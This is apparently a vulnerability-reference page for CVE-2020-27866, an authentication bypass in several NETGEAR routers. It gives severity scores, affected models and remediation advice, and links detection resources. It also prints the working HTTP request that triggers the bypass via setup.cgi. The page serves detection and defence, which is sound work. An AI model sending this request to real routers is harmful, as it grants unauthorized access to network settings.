🔙 목록으로 돌아가기

CVE-2020-27866: NETGEAR - Authentication Bypass

TitleNETGEAR - Authentication Bypass
Authorgy741
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify network configurations, intercept traffic, or launch further attacks.
RemediationApply the latest firmware update provided by NETGEAR to fix the authentication bypass vulnerability.
CVSS Score8.8
EPSS Score0.9036
CVE IDCVE-2020-27866
CWE IDCWE-288,CWE-287
Tags cve cve2020 netgear auth-bypass vuln vkev

🔍 Vulnerability Description

NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.

🌐 HTTP Request

GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-27866.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-27866.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A